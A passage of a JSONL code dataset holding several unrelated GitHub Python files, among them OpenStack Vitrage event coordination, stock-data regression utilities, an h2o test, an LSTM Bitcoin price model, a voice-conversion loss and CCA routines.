led_data\r\n","repo_name":"dhocker/led-emulator","sub_path":"ledsocketserver/TCPRequestHandler.py","file_name":"TCPRequestHandler.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"75044537794","text":"print ('Suma de los numeros pares')\r\nlista = [20]\r\nnumlista=0\r\nsumador=0\r\nfor x in range (1,41):\r\n if x%2==0:\r\n lista.insert(numlista,x)\r\n numlista+=1\r\nfor y in range (0,20):\r\n print (lista[y])\r\n sumador=lista[y]+sumador\r\n\r\nprint('La suma del arreglo es ',sumador)\r\ninput()\r\n","repo_name":"CamiloRozoP/Python-Fundamentals","sub_path":"Ejercicio#a18.py","file_name":"Ejercicio#a18.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24898431707","text":"import threading\nimport time\n\nfrom oslo_log import log\nimport oslo_messaging\n\nfrom vitrage.common.constants import DatasourceAction\nfrom vitrage.common.utils import spawn\nfrom vitrage.entity_graph import datasource_rpc as ds_rpc\nfrom vitrage.entity_graph import EVALUATOR_TOPIC\nfrom vitrage.entity_graph.processor.processor import Processor\nfrom vitrage.entity_graph.scheduler import Scheduler\nfrom vitrage.entity_graph.workers import GraphWorkersManager\nfrom vitrage import messaging\n\nLOG = log.getLogger(__name__)\n\n\nclass VitrageGraphInit(object):\n def __init__(self, conf, graph, db_connection):\n self.conf = conf\n self.graph = graph\n self.db = db_connection\n self.workers = GraphWorkersManager(conf, graph, db_connection)\n self.events_coordination = EventsCoordination(\n conf,\n self.process_event,\n conf.datasources.notification_topic_collector,\n EVALUATOR_TOPIC)\n self.scheduler = Scheduler(conf, graph, self.events_coordination)\n self.processor = Processor(conf, graph, self.scheduler.graph_persistor)\n\n def run(self):\n LOG.info('Init Started')\n LOG.info('clearing database active_actions')\n self.db.active_actions.delete()\n ds_rpc.get_all(\n ds_rpc.create_rpc_client_instance(self.conf),\n self.events_coordination,\n self.conf.datasources.types,\n action=DatasourceAction.INIT_SNAPSHOT,\n retry_on_fault=True,\n first_call_timeout=10)\n self.processor.start_notifier()\n spawn(self.start_all_workers)\n self.workers.run()\n\n def start_all_workers(self):\n self.workers.submit_start_evaluations() # evaluate entire graph\n self.graph.subscribe(self.workers.submit_graph_update)\n self.scheduler.start_periodic_tasks()\n LOG.info('Init Finished')\n self.events_coordination.start()\n\n def process_event(self, event):\n if event.get('template_action'):\n self.workers.submit_template_event(event)\n self.workers.submit_evaluators_reload_templates()\n else:\n self.processor.process_event(event)\n\n\nPRIORITY_DELAY = 0.05\n\n\nclass EventsCoordination(object):\n def __init__(self, conf, do_work_func, topic_low, topic_high):\n self._conf = conf\n self._lock = threading.Lock()\n self._high_event_finish_time = 0\n\n def do_work(event):\n try:\n return do_work_func(event)\n except Exception:\n LOG.exception('Got Exception for event %s', str(event))\n\n self._do_work_func = do_work\n\n self._low_pri_listener = self._init_listener(\n topic_low, self._do_low_priority_work)\n self._high_pri_listener = self._init_listener(\n topic_high, self._do_high_priority_work)\n\n def start(self):\n LOG.info('Listening on %s', self._high_pri_listener.targets[0].topic)\n LOG.info('Listening on %s', 
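The receive method above implements the classic read-exactly-N loop; socket.recv may return fewer bytes than requested, so a single call is never enough. A standalone variant that raises on a half-closed peer and joins the chunks once instead of concatenating a bytes object per segment (quadratic in the worst case):

import socket

def recv_exact(sock: socket.socket, count: int) -> bytes:
    """Read exactly `count` bytes from a connected socket or raise."""
    chunks = []
    while count:
        seg = sock.recv(count)
        if not seg:  # peer closed the connection mid-frame
            raise ConnectionError("socket closed before frame completed")
        chunks.append(seg)
        count -= len(seg)
    return b"".join(chunks)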
self._low_pri_listener.targets[0].topic)\n self._high_pri_listener.start()\n self._low_pri_listener.start()\n\n def stop(self):\n self._low_pri_listener.stop()\n self._high_pri_listener.stop()\n\n def wait(self):\n self._low_pri_listener.wait()\n self._high_pri_listener.wait()\n\n def _do_high_priority_work(self, event):\n self._lock.acquire()\n self._do_work_func(event)\n self._high_event_finish_time = time.time()\n self._lock.release()\n\n def _do_low_priority_work(self, event):\n while True:\n self._lock.acquire()\n if (time.time() - self._high_event_finish_time) < PRIORITY_DELAY:\n self._lock.release()\n time.sleep(PRIORITY_DELAY)\n else:\n break\n self._do_work_func(event)\n self._lock.release()\n\n def handle_multiple_low_priority(self, events):\n for e in events:\n self._do_low_priority_work(e)\n\n def _init_listener(self, topic, callback):\n if not topic:\n return\n return messaging.get_notification_listener(\n transport=messaging.get_transport(self._conf),\n targets=[oslo_messaging.Target(topic=topic)],\n endpoints=[PushNotificationsEndpoint(callback)])\n\n\nclass PushNotificationsEndpoint(object):\n def __init__(self, process_event_callback):\n self.process_event_callback = process_event_callback\n\n def info(self, ctxt, publisher_id, event_type, payload, metadata):\n try:\n self.process_event_callback(payload)\n except Exception:\n LOG.exception('Failed to process event callback.')\n","repo_name":"HoonMinJeongUm/Hoonmin-vitrage","sub_path":"vitrage/entity_graph/graph_init.py","file_name":"graph_init.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70151651715","text":"# -*- coding: utf-8 -*-\n# @Author: JinZhang\n# @Date: 2018-03-22 13:06:26\n# @Last Modified by: JinZhang\n# @Last Modified time: 2018-03-23 13:09:51\n\nimport _global as _GG;\n\nimport init as Init;\n\nclass Loader:\n\tdef __init__(self):\n\t\tRunner = Init.Loader();\n\t\t_GG.setG(\"test99\", [1,11,9]);\n\t\tRunner.run();\n\n\nif __name__ == \"__main__\":\n\t_GG.setG(\"test1\", 999);\n\tLoader()","repo_name":"JDreamHeart/DailyCodes","sub_path":"python/全局变量/_load.py","file_name":"_load.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16923945535","text":"from sklearn import linear_model\nfrom statsmodels.tsa import stattools\nimport statsmodels.api as sm\n\nfrom .DyStockDataUtility import *\n\n\nclass DyStockDataML(object):\n \"\"\" 股票数据的机器学习类 \"\"\"\n \n def predictReboundVol(df, w=4):\n \"\"\"\n amount = rebound increase pct + previous decrease pct\n \"\"\"\n extremas, peaks, bottoms = DyStockDataUtility.swings(df, w=w)\n\n # price of swings\n peakPrices = df.ix[peaks.index, 'high']\n peakPrices.name = 'price'\n\n bottomPrices = df.ix[bottoms.index, 'low']\n bottomPrices.name = 'price'\n\n swingPrices = pd.concat([peakPrices, bottomPrices])\n swingPrices = swingPrices.sort_index()\n\n # decrease and increase of point\n swingPricesPct = swingPrices.pct_change()*100\n\n bottomDescrease = swingPricesPct\n bottomDescrease.name = 'decrease'\n\n bottomIncrease = swingPricesPct.shift(-1)\n bottomIncrease.name = 'increase'\n\n # bottom equation\n bottomDescrease = bottomDescrease.ix[bottoms.index]\n bottomIncrease = bottomIncrease.ix[bottoms.index]\n bottomAmount = df.ix[bottoms.index, 'amt']\n bottomAmount.name = 'amount'\n\n bottomEquation = pd.concat([bottomAmount, bottomDescrease, bottomIncrease], axis=1)\n 
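EventsCoordination in the vitrage record above gates low-priority events behind a lock plus a short cool-down after each high-priority event. Stripped of the oslo.messaging plumbing, the gating pattern is roughly this (class and method names are illustrative, not vitrage API):

import threading
import time

PRIORITY_DELAY = 0.05

class PriorityGate:
    def __init__(self):
        self._lock = threading.Lock()
        self._high_finish = 0.0

    def do_high(self, func, event):
        with self._lock:
            func(event)
            self._high_finish = time.time()

    def do_low(self, func, event):
        while True:
            self._lock.acquire()
            if time.time() - self._high_finish < PRIORITY_DELAY:
                self._lock.release()
                time.sleep(PRIORITY_DELAY)  # back off while high-priority work is fresh
            else:
                break
        try:
            func(event)  # lock is still held here, as in the original
        finally:
            self._lock.release()

gate = PriorityGate()
gate.do_high(print, 'urgent event')
gate.do_low(print, 'background event')  # waits out the cool-down first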
bottomEquation.dropna(inplace=True)\n\n # 线性回归\n regr = linear_model.LinearRegression()\n regr.fit(bottomEquation[['decrease', 'increase']], bottomEquation['amount'])\n\n # predict\n predictOutcome = regr.predict([[-7, 3]])\n\n return predictOutcome\n\n def adfTest(s):\n \"\"\"\n ADF Test\n p值越大:随机漫步,可能是趋势\n p值越小:均值回归\n \"\"\"\n result = stattools.adfuller(s, 1)\n\n return result[1]\n\n def trendChannel(df, w=4):\n \"\"\"\n 生成趋势通道\n \"\"\"\n def _ols(Y, X):\n X = sm.add_constant(X)\n results = sm.OLS(Y, X).fit()\n intercept, slope = results.params\n\n return intercept, slope, results.rsquared\n\n # get swing\n extremas, peaks, bottoms = DyStockDataUtility.swings(df, w=w)\n\n # get x-coordinates\n peaksX = [extremas.index.get_loc(i) for i in peaks.index]\n\n # find the best trend channel\n if len(extremas) < 6:\n return None, None\n\n # from time latest to oldest\n xRange = list(range(len(extremas)))\n i = -6\n trendChannelUp, trendChannelDown = None, None # [intercept, slope]\n trendChannelUpX, trendChannelDownX = None, None\n while i > -len(extremas):\n peaksX_, bottomsX_ = [], []\n for x in xRange[i:]:\n if x in peaksX:\n peaksX_.append(x)\n else:\n bottomsX_.append(x)\n\n # 线性回归, Y = aX + b\n interceptPeak, slopePeak, rSquaredPeak = _ols(extremas.values[peaksX_], np.array(peaksX_))\n interceptBottom, slopeBottom, rSquaredBottom = _ols(extremas.values[bottomsX_], np.array(bottomsX_))\n\n if rSquaredPeak >= 0.8**2 and rSquaredBottom >= 0.8**2:\n if trendChannelUp is None or \\\n abs(slopePeak - slopeBottom) <= abs(trendChannelUp[1] - trendChannelDown[1]): # 上下轨越平行越好\n trendChannelUp = [interceptPeak, slopePeak]\n trendChannelDown = [interceptBottom, slopeBottom]\n\n trendChannelUpX, trendChannelDownX = peaksX_, bottomsX_\n\n i -= 2 # one peak and bottom\n\n if trendChannelUp is None:\n return None, None\n\n # get 2 points each trend channel up line and down line by regression line\n # up of channel\n trendChannelUp1Time = extremas.index[trendChannelUpX[0]]\n trendChannelUp1Price = trendChannelUp[1]*trendChannelUpX[0] + trendChannelUp[0]\n\n trendChannelUp2Time = extremas.index[trendChannelUpX[-1]]\n trendChannelUp2Price = trendChannelUp[1]*trendChannelUpX[-1] + trendChannelUp[0]\n\n trendChannelUpS = pd.Series([trendChannelUp1Price, trendChannelUp2Price], index=[trendChannelUp1Time, trendChannelUp2Time])\n\n # down of channel\n trendChannelDown1Time = extremas.index[trendChannelDownX[0]]\n trendChannelDown1Price = trendChannelDown[1]*trendChannelDownX[0] + trendChannelDown[0]\n\n trendChannelDown2Time = extremas.index[trendChannelDownX[-1]]\n trendChannelDown2Price = trendChannelDown[1]*trendChannelDownX[-1] + trendChannelDown[0]\n\n trendChannelDownS = pd.Series([trendChannelDown1Price, trendChannelDown2Price], index=[trendChannelDown1Time, trendChannelDown2Time])\n\n return trendChannelUpS, trendChannelDownS","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Data/Utility/DyStockDataML.py","file_name":"DyStockDataML.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"} +{"seq_id":"13350797084","text":"import sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\ndef partial_plot_row_index():\n data = h2o.import_file(pyunit_utils.locate('smalldata/prostate/prostate_cat_NA.csv'))\n x = data.names\n y = 'CAPSULE'\n x.remove(y)\n\n # Build a GBM model predicting for response CAPSULE\n gbm_model = 
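predictReboundVol in the record above reduces to an ordinary least-squares fit of traded amount against a swing's decrease/increase, followed by one predict call. A toy, self-contained version on fabricated data:

import numpy as np
from sklearn import linear_model

rng = np.random.default_rng(0)
X = rng.uniform(-10, 10, size=(50, 2))              # columns: decrease, increase
y = 3.0 * np.abs(X[:, 0]) + 2.0 * X[:, 1] + rng.normal(0, 1, 50)

regr = linear_model.LinearRegression()
regr.fit(X, y)
print(regr.predict([[-7, 3]]))                      # same query as the original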
H2OGradientBoostingEstimator(ntrees=50, learn_rate=0.05, seed=12345)\n gbm_model.train(x=x, y=y, training_frame=data)\n\n # Generate Partial Dependence for row index -1 and row index 0, they should differ\n pdp = gbm_model.partial_plot(frame=data, cols=['RACE'], plot=False, plot_stddev=False, row_index=-1)\n pdp0 = gbm_model.partial_plot(frame=data, cols=['RACE'], plot=False, plot_stddev=False, row_index=0)\n assert not(pyunit_utils.equal_two_arrays(pdp[0][1], pdp0[0][1], throw_error=False))\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(partial_plot_row_index)\nelse:\n partial_plot_row_index()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_jira/pyunit_pubdev_7705.py","file_name":"pyunit_pubdev_7705.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"16894525074","text":"#!/usr/bin/env python3\r\n\r\nimport pandas as pd\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\n\r\nnumpy.random.seed(10)\r\n\r\ndataframe = pd.read_csv('./processed_data/btcusdcomplete.csv', parse_dates=['time_close'])\r\ndataframe['time_close'] = pd.to_datetime(dataframe['time_close'], unit='s')\r\ndataframe = dataframe.set_index('time_close')\r\n\r\n#* convert an array of values into a dataset matrix\r\ndef create_dataset(dataset, look_back=1):\r\n\tdataX, dataY = [], []\r\n\tfor i in range(len(dataset)-look_back-1):\r\n\t\ta = dataset[i:(i+look_back)]\r\n\t\tdataX.append(a)\r\n\t\tdataY.append(dataset[i + look_back])\r\n\treturn (numpy.array(dataX), numpy.array(dataY))\r\n\r\n\r\n#* load the dataset\r\ndataset = dataframe['rate_close']\r\ndataset = dataset.astype('float32')\r\n#* dataset = dataset[-4380:]\r\n\r\n#* split into training, validation and testing sets in 70, 20 and 10 percents respectively\r\ntrain_size = int(len(dataset)*0.70)\r\nvalid_size = int(len(dataset)*0.20)\r\ntrain = dataset[:train_size]\r\nvalid = dataset[train_size:train_size+valid_size]\r\ntest = dataset[train_size+valid_size:]\r\n\r\n#* reshape datasets\r\nlook_back = 72\r\ntrainX, trainY = create_dataset(train, look_back=look_back)\r\nvalidX, validY = create_dataset(valid, look_back=look_back)\r\ntestX, testY = create_dataset(test, look_back=look_back)\r\n\r\n# *creating callbacks to save model\r\n# cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath='./eth-model/',\r\n# save_weights_only=True,\r\n# verbose=1)\r\nprint(f'{trainX.shape} {trainY.shape}')\r\n#* model creation and fitting\r\nmodel = tf.keras.Sequential([\r\n\ttf.keras.layers.LSTM(24, input_shape=(look_back, 1),\r\n\t activation=tf.nn.relu, return_sequences=True),\r\n\ttf.keras.layers.Bidirectional(\r\n\t\ttf.keras.layers.LSTM(12, activation=tf.nn.relu)),\r\n\ttf.keras.layers.Flatten(),\r\n\ttf.keras.layers.Dense(1),\r\n])\r\n\r\nmodel.compile(loss=tf.keras.losses.MeanSquaredError(),\r\n optimizer=tf.keras.optimizers.Adam())\r\n\r\nmodel.fit(trainX, trainY, epochs=15, batch_size=5,\r\n verbose=2, validation_data=(validX, validY))\r\n\r\n# model.save_weights('./btc-weights/')\r\n\r\n#* generate predictions for training\r\ntrainPredict = model.predict(trainX)\r\nvalidPredict = model.predict(validX)\r\ntestPredict = model.predict(testX)\r\n\r\n#* shift train predictions for plotting\r\ntrainPredictPlot = numpy.empty_like(dataset)\r\ntrainPredictPlot[:] = numpy.nan\r\ntrainPredictPlot[look_back:len(\r\n\ttrainPredict)+look_back] = numpy.squeeze(trainPredict)\r\n\r\n#* shift valid predictions for 
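The test above leans on h2o's own pyunit_utils.equal_two_arrays helper; if only the comparison idea is needed, a rough numpy-only stand-in (tolerance chosen arbitrarily here) could be:

import numpy as np

def arrays_differ(a, b, tol=1e-10):
    # True when the two arrays disagree in shape or values.
    a, b = np.asarray(a, dtype=float), np.asarray(b, dtype=float)
    return a.shape != b.shape or not np.allclose(a, b, atol=tol)

assert arrays_differ([1.0, 2.0], [1.0, 2.5])        # differing PDP values
assert not arrays_differ([1.0, 2.0], [1.0, 2.0])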
plotting\r\nvalidPredictPlot = numpy.empty_like(dataset)\r\nvalidPredictPlot[:] = numpy.nan\r\nvalidPredictPlot[len(trainPredict)+look_back:len(trainPredict) +\r\n valid_size-1] = numpy.squeeze(validPredict)\r\n\r\n#* shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(dataset)\r\ntestPredictPlot[:] = numpy.nan\r\ntestPredictPlot[len(trainPredict)+valid_size+(look_back*2) +\r\n 1:len(dataset)-1] = numpy.squeeze(testPredict)\r\n\r\nplt.plot(dataframe.index.values, dataframe['rate_close'], 'r-', label='Real')\r\nplt.plot(dataframe.index.values, trainPredictPlot,\r\n color='green', label='Training Predictions')\r\nplt.plot(dataframe.index.values, validPredictPlot,\r\n color='blue', label='Validation Predictions')\r\nplt.plot(dataframe.index.values, testPredictPlot,\r\n color='orange', label='Testing Predictions')\r\nplt.xlabel('Date')\r\nplt.ylabel('Values')\r\nplt.title('Results')\r\nplt.legend()\r\nplt.show()","repo_name":"diysumit/Major-Project-471-445-429-427","sub_path":"data/predict_data.py","file_name":"predict_data.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34152058731","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom .utils import get_mask_from_lengths\n\nclass ParrotLoss(nn.Module):\n def __init__(self, hparams):\n super(ParrotLoss, self).__init__()\n self.hidden_dim = hparams.encoder_embedding_dim\n self.ce_loss = hparams.ce_loss\n\n self.L1Loss = nn.L1Loss(reduction='none')\n self.MSELoss = nn.MSELoss(reduction='none')\n self.BCEWithLogitsLoss = nn.BCEWithLogitsLoss(reduction='none')\n self.CrossEntropyLoss = nn.CrossEntropyLoss(reduction='none')\n self.n_frames_per_step = hparams.n_frames_per_step_decoder\n self.eos = hparams.n_symbols\n self.predict_spectrogram = hparams.predict_spectrogram\n\n self.contr_w = hparams.contrastive_loss_w\n self.spenc_w = hparams.speaker_encoder_loss_w\n self.texcl_w = hparams.text_classifier_loss_w\n self.spadv_w = hparams.speaker_adversial_loss_w\n self.spcla_w = hparams.speaker_classifier_loss_w\n\n def parse_targets(self, targets, text_lengths):\n '''\n text_target [batch_size, text_len]\n mel_target [batch_size, mel_bins, T]\n spc_target [batch_size, spc_bins, T]\n speaker_target [batch_size]\n stop_target [batch_size, T]\n '''\n text_target, mel_target, spc_target, speaker_target, stop_target = targets\n\n B = stop_target.size(0)\n stop_target = stop_target.reshape(B, -1, self.n_frames_per_step)\n stop_target = stop_target[:, :, 0]\n\n padded = torch.tensor(text_target.data.new(B,1).zero_())\n text_target = torch.cat((text_target, padded), dim=-1)\n \n # adding the ending token for target\n for bid in range(B):\n text_target[bid, text_lengths[bid].item()] = self.eos\n\n return text_target, mel_target, spc_target, speaker_target, stop_target\n \n def forward(self, model_outputs, targets, input_text, eps=1e-5):\n\n '''\n predicted_mel [batch_size, mel_bins, T]\n predicted_stop [batch_size, T/r]\n alignment \n when input_text==True [batch_size, T/r, max_text_len] \n when input_text==False [batch_size, T/r, T/r]\n text_hidden [B, max_text_len, hidden_dim]\n mel_hidden [B, max_text_len, hidden_dim]\n text_logit_from_mel_hidden [B, max_text_len+1, n_symbols+1]\n speaker_logit_from_mel [B, n_speakers]\n speaker_logit_from_mel_hidden [B, max_text_len, n_speakers]\n text_lengths [B,]\n mel_lengths [B,]\n '''\n predicted_mel, post_output, predicted_stop, alignments,\\\n text_hidden, 
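The create_dataset windowing in the LSTM script above is easiest to verify on a tiny series; with look_back=3, every X row holds 3 consecutive values and y is the value that follows:

import numpy as np

def create_dataset(dataset, look_back=1):
    # Same sliding-window logic as the script above, on a plain numpy array.
    dataX, dataY = [], []
    for i in range(len(dataset) - look_back - 1):
        dataX.append(dataset[i:i + look_back])
        dataY.append(dataset[i + look_back])
    return np.array(dataX), np.array(dataY)

series = np.arange(10, dtype='float32')
X, y = create_dataset(series, look_back=3)
print(X.shape, y.shape)   # (6, 3) (6,)
print(X[0], y[0])         # [0. 1. 2.] 3.0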
mel_hidden, text_logit_from_mel_hidden, \\\n audio_seq2seq_alignments, \\\n speaker_logit_from_mel, speaker_logit_from_mel_hidden, \\\n text_lengths, mel_lengths = model_outputs\n\n text_target, mel_target, spc_target, speaker_target, stop_target = self.parse_targets(targets, text_lengths)\n\n ## get masks ##\n mel_mask = get_mask_from_lengths(mel_lengths, mel_target.size(2)).unsqueeze(1).expand(-1, mel_target.size(1), -1).float()\n spc_mask = get_mask_from_lengths(mel_lengths, mel_target.size(2)).unsqueeze(1).expand(-1, spc_target.size(1), -1).float()\n\n mel_step_lengths = torch.ceil(mel_lengths.float() / self.n_frames_per_step).long()\n stop_mask = get_mask_from_lengths(mel_step_lengths, \n int(mel_target.size(2)/self.n_frames_per_step)).float() # [B, T/r]\n text_mask = get_mask_from_lengths(text_lengths).float()\n text_mask_plus_one = get_mask_from_lengths(text_lengths + 1).float()\n\n # reconstruction loss #\n recon_loss = torch.sum(self.L1Loss(predicted_mel, mel_target) * mel_mask) / torch.sum(mel_mask)\n\n if self.predict_spectrogram:\n recon_loss_post = (self.L1Loss(post_output, spc_target) * spc_mask).sum() / spc_mask.sum()\n else:\n recon_loss_post = (self.L1Loss(post_output, mel_target) * mel_mask).sum() / torch.sum(mel_mask)\n \n stop_loss = torch.sum(self.BCEWithLogitsLoss(predicted_stop, stop_target) * stop_mask) / torch.sum(stop_mask)\n\n\n if self.contr_w == 0.:\n contrast_loss = torch.tensor(0.).cuda()\n else:\n # contrastive mask #\n contrast_mask1 = get_mask_from_lengths(text_lengths).unsqueeze(2).expand(-1, -1, mel_hidden.size(1)) # [B, text_len] -> [B, text_len, T/r]\n contrast_mask2 = get_mask_from_lengths(text_lengths).unsqueeze(1).expand(-1, text_hidden.size(1), -1) # [B, T/r] -> [B, text_len, T/r]\n contrast_mask = (contrast_mask1 & contrast_mask2).float()\n text_hidden_normed = text_hidden / (torch.norm(text_hidden, dim=2, keepdim=True) + eps)\n mel_hidden_normed = mel_hidden / (torch.norm(mel_hidden, dim=2, keepdim=True) + eps)\n\n # (x - y) ** 2 = x ** 2 + y ** 2 - 2xy\n distance_matrix_xx = torch.sum(text_hidden_normed ** 2, dim=2, keepdim=True) #[batch_size, text_len, 1]\n distance_matrix_yy = torch.sum(mel_hidden_normed ** 2, dim=2)\n distance_matrix_yy = distance_matrix_yy.unsqueeze(1) #[batch_size, 1, text_len]\n\n #[batch_size, text_len, text_len]\n distance_matrix_xy = torch.bmm(text_hidden_normed, torch.transpose(mel_hidden_normed, 1, 2)) \n distance_matrix = distance_matrix_xx + distance_matrix_yy - 2 * distance_matrix_xy\n \n TTEXT = distance_matrix.size(1)\n hard_alignments = torch.eye(TTEXT).cuda()\n contrast_loss = hard_alignments * distance_matrix + \\\n (1. - hard_alignments) * torch.max(1. 
- distance_matrix, torch.zeros_like(distance_matrix))\n\n contrast_loss = torch.sum(contrast_loss * contrast_mask) / torch.sum(contrast_mask)\n\n n_speakers = speaker_logit_from_mel_hidden.size(2)\n TTEXT = speaker_logit_from_mel_hidden.size(1)\n n_symbols_plus_one = text_logit_from_mel_hidden.size(2)\n\n # speaker classification loss #\n speaker_encoder_loss = nn.CrossEntropyLoss()(speaker_logit_from_mel, speaker_target)\n _, predicted_speaker = torch.max(speaker_logit_from_mel,dim=1)\n speaker_encoder_acc = ((predicted_speaker == speaker_target).float()).sum() / float(speaker_target.size(0))\n\n speaker_logit_flatten = speaker_logit_from_mel_hidden.reshape(-1, n_speakers) # -> [B* TTEXT, n_speakers]\n _, predicted_speaker = torch.max(speaker_logit_flatten, dim=1)\n speaker_target_flatten = speaker_target.unsqueeze(1).expand(-1, TTEXT).reshape(-1)\n speaker_classification_acc = ((predicted_speaker == speaker_target_flatten).float() * text_mask.reshape(-1)).sum() / text_mask.sum()\n loss = self.CrossEntropyLoss(speaker_logit_flatten, speaker_target_flatten)\n\n speaker_classification_loss = torch.sum(loss * text_mask.reshape(-1)) / torch.sum(text_mask)\n\n # text classification loss #\n text_logit_flatten = text_logit_from_mel_hidden.reshape(-1, n_symbols_plus_one)\n text_target_flatten = text_target.reshape(-1)\n _, predicted_text = torch.max(text_logit_flatten, dim=1)\n text_classification_acc = ((predicted_text == text_target_flatten).float()*text_mask_plus_one.reshape(-1)).sum()/text_mask_plus_one.sum()\n loss = self.CrossEntropyLoss(text_logit_flatten, text_target_flatten)\n text_classification_loss = torch.sum(loss * text_mask_plus_one.reshape(-1)) / torch.sum(text_mask_plus_one)\n\n # speaker adversival loss #\n flatten_target = 1. / n_speakers * torch.ones_like(speaker_logit_flatten)\n loss = self.MSELoss(F.softmax(speaker_logit_flatten, dim=1), flatten_target)\n mask = text_mask.unsqueeze(2).expand(-1,-1, n_speakers).reshape(-1, n_speakers)\n\n if self.ce_loss:\n speaker_adversial_loss = - speaker_classification_loss\n else:\n speaker_adversial_loss = torch.sum(loss * mask) / torch.sum(mask)\n \n loss_list = [recon_loss, recon_loss_post, stop_loss,\n contrast_loss, speaker_encoder_loss, speaker_classification_loss,\n text_classification_loss, speaker_adversial_loss]\n \n acc_list = [speaker_encoder_acc, speaker_classification_acc, text_classification_acc]\n \n \n combined_loss1 = recon_loss + recon_loss_post + stop_loss + self.contr_w * contrast_loss + \\\n self.spenc_w * speaker_encoder_loss + self.texcl_w * text_classification_loss + \\\n self.spadv_w * speaker_adversial_loss\n\n combined_loss2 = self.spcla_w * speaker_classification_loss\n \n return loss_list, acc_list, combined_loss1, combined_loss2\n\n","repo_name":"jxzhanggg/nonparaSeq2seqVC_code","sub_path":"pre-train/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"61"} +{"seq_id":"29100819775","text":"\nimport numpy as np\nimport tensorflow as tf\n\neps_eig = 1e-6\n\ndef linCCA(H1, H2, dim, rcov1, rcov2):\n\n\tN, d1 = H1.shape\n\t_, d2 = H2.shape\n\n\t# Remove mean.\n\tm1 = np.mean(H1, axis=0, keepdims=True)\n\tH1 = H1 - np.tile(m1, [N,1])\n\n\tm2 = np.mean(H2, axis=0, keepdims=True)\n\tH2 = H2 - np.tile(m2, [N,1])\n\n\tS11 = np.matmul(H1.transpose(), H1) / (N-1) + rcov1 * np.eye(d1)\n\tS22 = np.matmul(H2.transpose(), H2) / (N-1) + rcov2 * np.eye(d2)\n\tS12 = np.matmul(H1.transpose(), H2) / 
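ParrotLoss above repeatedly averages an element-wise loss under a length mask; the pattern in isolation, with made-up shapes, looks like this:

import torch

loss_fn = torch.nn.L1Loss(reduction='none')
pred = torch.randn(2, 80, 100)                 # [batch, mel_bins, T]
target = torch.randn(2, 80, 100)
lengths = torch.tensor([100, 60])              # valid frames per batch item

t = torch.arange(100).unsqueeze(0)             # [1, T]
mask = (t < lengths.unsqueeze(1)).float()      # [batch, T], 1 = valid frame
mask = mask.unsqueeze(1).expand(-1, 80, -1)    # broadcast over mel bins

loss = torch.sum(loss_fn(pred, target) * mask) / torch.sum(mask)
print(loss.item())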
(N-1)\n\n\tE1, V1 = np.linalg.eig(S11)\n\tE2, V2 = np.linalg.eig(S22)\n\n\t# For numerical stability.\n\tidx1 = np.where(E1>eps_eig)[0]\n\tE1 = E1[idx1]\n\tV1 = V1[:, idx1]\n\n\tidx2 = np.where(E2>eps_eig)[0]\n\tE2 = E2[idx2]\n\tV2 = V2[:, idx2]\n\n\tK11 = np.matmul( np.matmul(V1, np.diag(np.reciprocal(np.sqrt(E1)))), V1.transpose())\n\tK22 = np.matmul( np.matmul(V2, np.diag(np.reciprocal(np.sqrt(E2)))), V2.transpose())\n\tT = np.matmul( np.matmul(K11, S12), K22)\n\t# print(T)\n\tU, E, V = np.linalg.svd(T, full_matrices=False)\n\tV = V.transpose()\n\n\tA = np.matmul(K11, U[:, 0:dim])\n\tB = np.matmul(K22, V[:, 0:dim])\n\tE = E[0:dim]\n\n\treturn A, B, m1, m2, E\n\n\ndef CanonCorr(H1, H2, N, d1, d2, dim, rcov1, rcov2):\n\n\t# Remove mean.\n\tm1 = tf.reduce_mean(H1, axis=0, keep_dims=True)\n\tH1 = tf.subtract(H1, m1)\n\n\tm2 = tf.reduce_mean(H2, axis=0, keep_dims=True)\n\tH2 = tf.subtract(H2, m2)\n\n\tS11 = tf.matmul(tf.transpose(H1), H1) / (N-1) + rcov1 * tf.eye(d1)\n\tS22 = tf.matmul(tf.transpose(H2), H2) / (N-1) + rcov2 * tf.eye(d2)\n\tS12 = tf.matmul(tf.transpose(H1), H2) / (N-1)\n\n\tE1, V1 = tf.self_adjoint_eig(S11)\n\tE2, V2 = tf.self_adjoint_eig(S22)\n\n\t# For numerical stability.\n\tidx1 = tf.where(E1>eps_eig)[:,0]\n\tE1 = tf.gather(E1, idx1)\n\tV1 = tf.gather(V1, idx1, axis=1)\n\n\tidx2 = tf.where(E2>eps_eig)[:,0]\n\tE2 = tf.gather(E2, idx2)\n\tV2 = tf.gather(V2, idx2, axis=1)\n\n\tK11 = tf.matmul(tf.matmul(V1, tf.diag(tf.reciprocal(tf.sqrt(E1)))), tf.transpose(V1))\n\tK22 = tf.matmul(tf.matmul(V2, tf.diag(tf.reciprocal(tf.sqrt(E2)))), tf.transpose(V2))\n\tT = tf.matmul(tf.matmul(K11, S12), K22)\n\n\t# Eigenvalues are sorted in increasing order.\n\tE3, U = tf.self_adjoint_eig(tf.matmul(T, tf.transpose(T)))\n\tidx3 = tf.where(E3 > 